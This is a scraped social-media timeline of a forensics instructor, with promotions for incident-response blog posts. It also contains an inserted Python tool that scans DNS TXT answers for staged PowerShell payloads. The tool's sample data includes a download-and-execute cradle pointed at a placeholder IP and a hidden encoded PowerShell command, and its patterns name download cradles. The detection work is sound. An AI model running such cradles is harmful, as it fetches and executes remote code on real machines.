Mathias Fuchs
@mathias_fuchs
Something with IR and Intelligence @InfoGuardAG, Certified Instructor and author @SANSInstitute (@SANSEMEA), Former Principal IR Consultant @Mandiant
Attackers love RDP for sneaky lateral moves—but every pixel leaves a clue! 🕵️♂️ Check out my latest blog on tracking attackers through logs, bitmap caches, and clipboard trails (plus a printer tale too funny to miss). #DFIR #BlueTeam #CyberSecurity medium.com/@mathias.fuchs…
🗓 Logs lie. Prefetch tattles. ShimCache whispers. Timestamps dance. Building timelines in DFIR isn’t just science—it’s chaos theory in action. Join me in taming Chronos: medium.com/@mathias.fuchs… #DFIR #IncidentResponse #CyberSecurity
🚨 Bob from Accounting could be your biggest cyber threat. Seriously. 83% of orgs saw insider attacks last year. Tesla sabotage, Snowden leaks—your office has never felt spookier. Read how to spot & stop these insider rogues 👉medium.com/@mathias.fuchs… #CyberSecurity #InsiderThreat
🕵️♂️ How do attackers ghost past your EDR? New blog post dives deep into evasion tricks—LOLBins, memory games, syscall magic & more. Time to up your detection game! 👻🔍 👉 medium.com/@mathias.fuchs…
Tier 1 SOC Analysts: Highest responsibility, least experience, infinite alerts—what could go wrong? Plenty. Find out how automation and AI could save your analysts' sanity (and yours). ☕️🤖 #CyberSecurity #SOC #AI medium.com/@mathias.fuchs…
Choosing an IR partner = Picking a parachute packer. 🪂 Know your red flags 🚩, must-haves ✅, and absolute no-gos ❌ before you're in free-fall. Dive into my latest blog 👉 medium.com/@mathias.fuchs… #CyberSecurity #IncidentResponse #DFIR #CISO
Last week: macOS forensics (easy!). This week: Linux forensics (not easy at all!). Ever wondered why Linux is tougher than Windows forensics? Scripts, logs, chaos! ☕🐧 #DFIR #Linux #CyberSecurity medium.com/@mathias.fuchs…
Think Mac forensics is harder than Windows? Think again. 🍏 Unified logs, fewer artifacts, built-in snapshots—macOS might be easier for DFIR. Except memory. That’s still hell. 🔥 Full deep dive for IR pros here 👉 medium.com/@mathias.fuchs… #DFIR #macOS #forensics #cybersecurity
🛡️ Microsoft's new ReFS filesystem is changing the rules of digital forensics & IR. NTFS artifacts are evolving—are you ready? Read our deep dive here: medium.com/@mathias.fuchs… #DFIR #ReFS #CyberSecurity #IncidentResponse #Forensics
Even the best responders can’t work miracles in the dark. 🔍 Why visibility is everything in incident response – and what EDRs & network monitoring don't tell you. Read the blog 👉 medium.com/@mathias.fuchs… #DFIR #CyberSecurity #IncidentResponse #Velociraptor
Brilliant!
No way, this really works! 🤯
% dig txt dfir.<redacted>.<tld> +short
[System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms'); [System.Windows.Forms.MessageBox]::Show('DFIR FTW!','BlueTeam <3')
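The TXT answer in the post above is itself a PowerShell one-liner, ready to be piped into Invoke-Expression by a stager that only ever talks DNS. The same property makes it huntable: TXT rdata normally looks like SPF, DMARC or verification tokens, not like .NET member calls or download cradles. The following is an added example, not code from the post or from the author: a heuristic triage of TXT answers as a resolver or passive-DNS log would record them. The log entries are constructed sample data and the names under example.invalid are placeholders; the indicator list is a starting point, not a complete signature set.

```python
"""Heuristic triage of DNS TXT answers for staged PowerShell / .NET payloads.

Added example, not code from the post. Input is a list of (queried name, TXT rdata)
pairs, the shape most resolver and passive-DNS logs can be reduced to.
"""
import base64
import re
from typing import Dict, List, Tuple

# TXT records that are expected in almost every environment; skipped outright.
BENIGN_PREFIXES = (
    "v=spf1", "v=DMARC1", "v=DKIM1",
    "google-site-verification=", "MS=", "apple-domain-verification=",
)

# Substrings and shapes typical of PowerShell / .NET one-liners, with a label per hit.
CODE_PATTERNS = [
    (re.compile(r"\[[A-Za-z_][\w.]*\]::"), "static .NET member call ([Type]::Member)"),
    (re.compile(r"\b(iex|invoke-expression)\b", re.I), "Invoke-Expression"),
    (re.compile(r"\bnew-object\b", re.I), "New-Object"),
    (re.compile(r"downloadstring|downloadfile|webclient|invoke-webrequest", re.I), "download cradle"),
    (re.compile(r"(^|\s)-(e|ec|encodedcommand)\s", re.I), "-EncodedCommand"),
    (re.compile(r"\bpowershell(\.exe)?\b", re.I), "powershell invocation"),
]

# A long run of base64 alphabet characters; 40 is enough to skip DKIM-style short tokens
# only because DKIM records are already dropped by BENIGN_PREFIXES.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def decoded_base64_hints(text: str) -> List[str]:
    """Return hints for long base64 runs whose decoded bytes read like a command."""
    hints = []
    for match in B64_RUN.finditer(text):
        run = match.group(0).rstrip("=")
        run += "=" * (-len(run) % 4)          # restore padding a stager may have stripped
        try:
            raw = base64.b64decode(run, validate=True)
        except (ValueError, base64.binascii.Error):
            continue
        # -EncodedCommand payloads are UTF-16LE; plain cradles are ASCII.
        for enc in ("utf-16-le", "ascii"):
            try:
                plain = raw.decode(enc)
            except UnicodeDecodeError:
                continue
            if re.search(r"powershell|iex|invoke|\$env", plain, re.I):
                hints.append("base64 run decodes to script text (%s)" % enc)
                break
    return hints


def triage_txt(rdata: str) -> List[str]:
    """Return the reasons one TXT rdata looks like staged code; an empty list means benign."""
    text = rdata.strip().strip('"')
    if text.startswith(BENIGN_PREFIXES):
        return []
    reasons = [label for rx, label in CODE_PATTERNS if rx.search(text)]
    reasons += decoded_base64_hints(text)
    return reasons


def scan_txt_log(records: List[Tuple[str, str]]) -> Dict[str, List[str]]:
    """Map every queried name with suspicious TXT rdata to the reasons it was flagged."""
    findings: Dict[str, List[str]] = {}
    for name, rdata in records:
        reasons = triage_txt(rdata)
        if reasons:
            findings.setdefault(name, []).extend(reasons)
    return findings


# Constructed sample log: one record in the spirit of the post, normal mail records,
# a classic download cradle, an -EncodedCommand style UTF-16LE blob and a harmless comment.
SAMPLE_TXT_ANSWERS = [
    ("dfir.example.invalid",
     "[System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms'); "
     "[System.Windows.Forms.MessageBox]::Show('DFIR FTW!','BlueTeam <3')"),
    ("example.invalid", "v=spf1 include:_spf.example.invalid -all"),
    ("_dmarc.example.invalid", "v=DMARC1; p=reject; rua=mailto:dmarc@example.invalid"),
    ("stage.example.invalid",
     "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a.ps1')"),
    ("enc.example.invalid",
     base64.b64encode("powershell -nop -w hidden -c IEX(1)".encode("utf-16-le")).decode()),
    ("txt.example.invalid", "just a plain text comment record"),
]

if __name__ == "__main__":
    for name, reasons in scan_txt_log(SAMPLE_TXT_ANSWERS).items():
        print(name, "->", "; ".join(reasons))
```

Run against a real log, the interesting output is not the hits on known-bad names but the TXT lookups for names nobody in the organisation should be resolving at all; pair the triage with a count of distinct TXT queries per client, since a stager polling for tasking stands out by volume long before its payload does.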
🎉 Congrats to @mathias_fuchs on being promoted to #SANS Senior Instructor! Mat is an instructor for #FOR508 & #FOR608. Congrats again, Mat! We are so lucky to have you be an instrumental part of the #DFIR curriculum! 👏 Learn more about Mat, here: sans.org/profiles/mathi…
What the hell is going on at @ContaboCom. Total outage of my servers. Only daily updates on the issue are not acceptable. I'll move my stuff to somewhere else.
I can see how users fall for that, but 5 vendors classify it as OK too, including security vendors. That domain's quite a s*hole forwarder. We observed that the site forwarded to one distributing Magniber ransomware.

Thank @shortxstack , your contributions are always great!
ATTN @limacharlieio and @velocidex and @TimesketchProj nerds: i built a POC/pipeline that takes triage artifacts from the LimaCharlie Velociraptor extension, processes them, and pushes them into Timesketch for analysis💙🦖🪵 i hope this helps someone 🤓 github.com/shortstack/lcv…
Does anyone have information on how Amazon will deal with the Digital Markets Act, specifically regarding their Echo Show 15 devices? They went to great lengths about a year ago to prevent sideloading. Now I guess they are required to lift that ban again.
I'm getting messages that my Memory FOR532 Class has gone - it was discontinued by SANS. I'll run an updated version of the class later this year on my own server. Thanks to @sansforensics for offering it for the last 1.5 years and to all the students and their valued feedback.
Received shocking news from @uniinnsbruck during(!) my Antarctic expedition: Despite having secured funding, I'm barred from working at the university soon. Heartless timing, and it jeopardizes my scientific career. No lab access = no sample processing or publishing. Plz RT this 🧵
On top of this, back home in Austria, I'm fighting another storm: the uncertainty of young researchers' job security. Unsure if I can even analyze my own Antarctic samples. No word for weeks from @uniinnsbruck. Feels like being left out in the cold. ❄️💔 #notfun @AustrianPolar